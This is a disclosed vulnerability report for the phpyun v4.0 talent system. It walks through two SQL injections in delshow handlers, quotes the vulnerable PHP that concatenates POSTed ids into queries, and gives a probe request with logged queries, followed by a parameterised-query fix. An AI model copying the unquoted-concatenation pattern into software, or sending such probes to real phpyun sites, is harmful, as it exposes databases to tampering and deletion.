
Vulnerability summary

Defect ID: wooyun-2015-0144424

Title: Two SQL injections in the latest phpyun (unaffected by GPC)

Vendor: php云人才系统 (PHP Yun Talent System)

Reporter: Xser

Submitted: 2015-10-05 17:42

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-10-05: Details sent to the vendor; awaiting vendor handling
2015-10-06: Vendor confirmed; details visible to the vendor only
2015-10-09: Details opened to third-party security partners (NSFOCUS, Tangchao Security Cruise)
2015-11-30: Details opened to core white hats and domain experts
2015-12-10: Details opened to regular white hats
2015-12-20: Details opened to intern white hats
2016-01-11: Details opened to the public

Brief description:

PHP Yun Talent System, phpyun v4.0 release, build20150819
4.0 has been rewritten, so do not judge this against the 3.2 code base.

Details:

The first injection is in
/member/com/model/show.class.php.
The 3.2 source is:

function delshow_action(){
    // $_POST['ids'] is concatenated, unquoted, into the IN (...) clause
    $company_show=$this->obj->DB_select_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","`picurl`");
    if(is_array($company_show)&&$company_show){
        foreach($company_show as $val){
            $this->obj->unlink_pic(".".$val['picurl']);
        }
        $this->obj->DB_delete_all("company_show","`id` in (".$_POST['ids'].") and `uid`='".$this->uid."'","");
    }
    return true;
}


Here is the 4.0 version:

function delshow_action(){
    $ids=$_POST['ids'];   // taken straight from POST, no filtering
    $company_show=$this->obj->DB_select_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`");
    if(is_array($company_show)&&$company_show){
        foreach($company_show as $val){
            unlink_pic(".".$val['picurl']);
        }
        $this->obj->DB_delete_all("company_show","`id` in (".$ids.") and `uid`='".$this->uid."'","");
        $this->obj->member_log("删除企业环境展示");
    }
    return true;
}

The POSTed value goes straight into the query without single quotes, so it can be injected regardless of magic_quotes_gpc. Pass a non-numeric string to confirm that it reaches the query. URL:

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

POST data:

ids=aaaa#

[Screenshot: QQ截图20151001141515.png]

The value is carried into the query unchanged:

2015/10/1 14:14	SELECT `picurl` FROM `phpyun_company_show` WHERE `id` in (aaaa#) and `uid`='1'


The second injection is in /member/user/model/show.class.php.
The change here is more visible:
3.2 read the del parameter via GET,
while 4.0 switched to reading it via POST, still without filtering.
In 3.2:

$delid=$_GET['del'];// del from GET is not filtered and is passed straight to delid


In 4.0:

$ids=$_POST['ids'];


Here is the 3.2 source:

function job(){
    ...
    // line 570
    if($_GET['del'] || is_array($_POST['checkboxid']))
    {
        if(is_array($_POST['checkboxid'])){
            $layer_type=1;
            $delid=$this->pylode(",",$_POST['checkboxid']);
        }else if($_GET['del']){
            $layer_type=0;
            $delid=$_GET['del'];// del from GET is not filtered and is passed straight to delid
        }
        // $delid is concatenated, unquoted, into every IN (...) clause below
        $rows=$this->obj->DB_select_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")","`state`");
        $nid=$this->obj->DB_delete_all("company_job","`uid`='".$this->uid."' and `id` in (".$delid.")"," ");
        echo $nid;
        $this->obj->DB_delete_all("company_job_link","`uid`='".$this->uid."' and `jobid` in (".$delid.")"," ");
    ...
}


Here is the 4.0 version:

function delshow_action(){
    $ids=$_POST['ids'];   // taken straight from POST, no filtering
    $resume_show=$this->obj->DB_select_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","`picurl`");
    if(is_array($resume_show)&&$resume_show){
        foreach($resume_show as $val){
            unlink_pic(".".$val['picurl']);
        }
        $this->obj->DB_delete_all("resume_show","`id` in (".$ids.") and `uid`='".$this->uid."'","");
        $this->obj->member_log("删除作品案例");
    }
    return true;
}

Again the POSTed value goes straight into the query without single quotes, so it can be injected. Pass a non-numeric string to confirm that it reaches the query. URL:

http://127.0.0.1/phpyun/member/index.php?c=show&act=delshow

POST data:

ids=aaaa#

[Screenshot: QQ截图20151001135656.png]

The value is carried into the query unchanged:

2015/10/1 13:56	SELECT `picurl` FROM `phpyun_resume_show` WHERE `id` in (aaaa#) and `uid`='2'


Proof of vulnerability:



Fix:

Change the clause to "`id` in ('".$ids."')":
adding single quotes around the value is enough to close the bare injection.
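Quoting $ids stops the unquoted break-out shown above, but it also turns a comma-separated list into a single string literal, so multi-id deletes stop working. As an added example, not phpyun's own code and not the reporter's patch, the form a code reviewer would ask for: whitelist the list to integers, then bind each id as a parameter so no request data reaches the SQL string. It assumes a PDO connection `$pdo` and the `phpyun_` table prefix visible in the logged query; `parse_id_list` and `delete_own_show` are names chosen here.

```php
<?php
// Added example (not phpyun's own code). Hardens the `id` in (...) clause
// from the report in two layers: integer whitelist, then bound parameters.

/**
 * Accept only a comma-separated list of positive integers such as "3,7,12".
 * Anything else, including the "aaaa#" probe from the report, yields null.
 */
function parse_id_list(string $raw): ?array {
    if (!preg_match('/^\d+(?:,\d+)*$/D', $raw)) {
        return null;
    }
    $ids = array_map('intval', explode(',', $raw));
    return array_values(array_unique($ids));
}

/**
 * Delete the caller's own rows from one of the show tables. $table is limited
 * to the two tables named in the report; $uid is the session user, never the
 * request; $rawIds is $_POST['ids'] as received.
 * Returns the number of rows deleted, or 0 when the input is rejected.
 */
function delete_own_show(PDO $pdo, string $table, int $uid, string $rawIds): int {
    if (!in_array($table, ['company_show', 'resume_show'], true)) {
        throw new InvalidArgumentException('unknown show table');
    }
    $ids = parse_id_list($rawIds);
    if ($ids === null) {
        return 0;   // reject the request instead of running a query
    }
    // one placeholder per id keeps multi-id deletes working
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $sql = "DELETE FROM `phpyun_{$table}` WHERE `id` IN ({$marks}) AND `uid` = ?";
    $stmt = $pdo->prepare($sql);
    $stmt->execute(array_merge($ids, [$uid]));
    return $stmt->rowCount();
}

// Usage inside delshow_action(), assuming $pdo and $this->uid are available:
// delete_own_show($pdo, 'company_show', (int)$this->uid, $_POST['ids'] ?? '');
```

The same validation should run before the preceding `DB_select_all` that fetches `picurl` for `unlink_pic`, since that query concatenates the identical value.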

Copyright notice: please credit Xser@WooYun when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-06 13:25

Vendor reply:

Thanks for the report, we will fix it as soon as possible!

Latest status:

None yet